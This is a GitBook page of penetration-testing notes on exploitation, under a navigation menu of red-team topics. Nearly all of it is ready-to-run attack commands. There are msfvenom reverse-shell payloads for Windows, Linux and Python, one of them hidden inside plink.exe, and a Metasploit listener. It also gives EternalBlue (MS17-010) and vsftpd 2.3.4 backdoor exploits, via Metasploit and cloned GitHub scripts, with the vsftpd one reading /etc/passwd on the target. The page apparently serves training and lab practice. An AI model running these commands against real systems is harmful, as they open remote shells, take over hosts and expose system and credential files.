🐧
Hassan Saad
  • WHO AM I ?
  • Red Teaming
    • C2 Infrastructure
    • External Reconnaissance
    • Initial Compromise
      • Executable File (EXE)
      • HTML Application (HTA)
      • Visual Basic (VBA Macros)
      • Password Spraying
      • MITM Attack
      • Email Spoofing
    • Host Reconnaissance
      • Seatbelt
      • Screenshots & Keylogging
    • Host Persistence
      • Task Scheduler
      • Startup Folder
      • Registry AutoRun
      • COM Hijacking
    • Host Privilege Escalation
      • Automated Tools
      • Unquoted Service Path
      • Weak Service Permission
      • Weak Service Binary
      • Always Install Elevated
      • UAC Bypass
    • Domain Reconnaissance
      • PowerView
      • BloodHound
      • Linux Host
      • Internal Applications
    • Lateral Movement
      • PowerShell Remoting
      • PsExec
      • WMI
      • DCOM
    • Credentials Access
      • LogonPasswords
      • Security Account Manager (SAM)
      • Domain Cached Creds
      • Kerberos Tickets
      • DPAPI
      • User Impersonation
      • Pass The Hash
      • Over Pass The Hash
      • Internal Password Spraying
      • Sniffing
      • NTLM Relay
    • Pivoting & Forwarding
      • SOCKS Proxy
      • Reverse Port Forwards
      • Local Port Forwards
      • Session Passing
      • P2P Listeners
      • NTLM Relay
    • Kerberos
      • Authentication
      • Kerberoasting
      • ASREP-Roasting
      • Unconstrained Delegation
      • Constrained Delegation
      • Linux Credential Cache
    • Group Policy
      • Enumeration
      • RSAT (GPMC)
      • Sharp GPO Abuse
    • Access Control Lists (DACL)
      • GenericAll
      • WriteDacl
      • WriteOwner
    • MS SQL Servers
      • Enumeration
      • NetNTLM Capture
      • Command Execution
      • Lateral Movement
      • Privilege Escalation
    • Domain Dominance
      • DCSync Backdoor
      • AdminSDHolder
      • Remote Registry Backdoor
      • Skeleton Key
      • Silver Ticket
      • Golden Ticket
    • Forest & Domain Trusts
      • Parent/Child
      • One Way (Inbound)
      • One Way (Outbound)
    • Evasion Techniques
      • Obfuscation
      • Process Injection
      • LAPS
      • AppLocker
      • PowerShell Constrained Mode
      • AMSI
      • Antivirus Exclusion
  • Penetration Testing
    • Information Gathering
    • Scanning
    • Exploitation
    • Post Exploitation
    • Password Attacks
    • Web Attacks
    • Exploit Development
  • Technology Essentials
    • Linux
      • Basics
      • Tasks
    • Windows
      • Basics
      • Tasks
    • Network
      • Basics
      • Tasks
    • Programming
      • Basics
      • Tasks
  • Bug Hunting
    • XSS on Nokia
    • XSS on Wuzzuf
    • Business Logic Flaw on Souq (Amazon Company)
    • Rate Limit Bypass on LinkedIn
    • Sensitive Data Exposure on Google
  • Tools
    • Recon Hunter
    • Mail Hunter
    • Mobile Hunter
    • Chimera (Threat Hunter)
  • Extras
    • SQL Injection
    • Web Basics
    • Mobile Testing
      • Mobile Testing 1
      • Mobile Testing 2
      • Mobile Testing 3
Powered by GitBook
On this page
  • Metasploit
  • Client-Side Attacks
  • Windows Service Side Attack
  • Linux Service Side Exploit
  1. Penetration Testing

Exploitation

Metasploit

# Start Metasploit
systemctl start postgresql
systemctl enable postgresql
msfdb init
msfconsole

# Metasploit Modules
Auxiliary:    Scripts for enumeration, scanning, fuzzing, sniffing etc...
Exploits:     Code to exploit the vulnerability and deliver the payload.
Payloads:     The code that executed on the victim.
Encoders:     Encode the payloads to another form.
Post:         Post exploitation scripts.
Nops:         Add nops bytes.
Evasion:      Scripts for evasion.

# Metasploit Commands
help
show {all|exploits|payloads|auxiliary}
search vsftpd
search type:exploit smb
info {ModuleName}
use {ModuleName}
show info | show options
set {Variable} {value}
exploit

# Ex1 SNMP service enumeration
use auxiliary/scanner/snmp/snmp_enum
show info
show options
set rhosts 192.168.1.244
run

# Ex2 SMB version scanning
use auxiliary/scanner/smb/smb_version
info | options
set rhosts 192.168.1.1-254
run

# Ex3 Test FTP anonymous login
use auxiliary/scanner/ftp/ftp_login
info | options
set pass_file /root/pass.txt
set blank_passwords true
set rhosts 192.168.1.0/24
set user_file /root/user.txt
run

Client-Side Attacks

Standalone Payload

# Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f exe > file.exe

# Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f elf > file.elf

# Python
msfvenom -p python/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -o file.py

# Embedded Inside File
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f exe -x /usr/share/windows-resources/binaries/plink.exe -o embedded.exe

Setup Listener

msfconsole
> use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> show options
> set LHOST 10.0.2.15
> set LPORT 4444
> exploit

Windows Service Side Attack

Exploit for MS17-010

use exploit/windows/smb/ms17_010_eternalblue
show options | show info
set rhosts 192.168.1.19
show payloads
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.114
exploit

Manual Exploit for MS17-010

https://github.com/3ndG4me/AutoBlue-MS17-010
cd AutoBlue-MS17-010
cd shellcode
./shell_prep.sh
cd ..
./listener_prep.sh
python eternalblue_exploit7.py 192.168.1.4 shellcode/sc_all.bin

Linux Service Side Exploit

Exploit for vsftpd 2.3.4

use exploit/unix/ftp/vsftpd_234_backdoor
show options | show info
set rhosts 192.168.1.115
show payloads
set payload cmd/unix/interact
exploit

Manual Exploit for vsftpd 2.3.4

git clone https://github.com/In2econd/vsftpd-2.3.4-exploit
cd vsftpd-2.3.4-exploit
python3 vsftpd_234_exploit.py 192.168.1.115 21 whoami
python3 vsftpd_234_exploit.py 192.168.1.115 21 "cat /etc/passwd"
PreviousScanningNextPost Exploitation

Last updated 2 years ago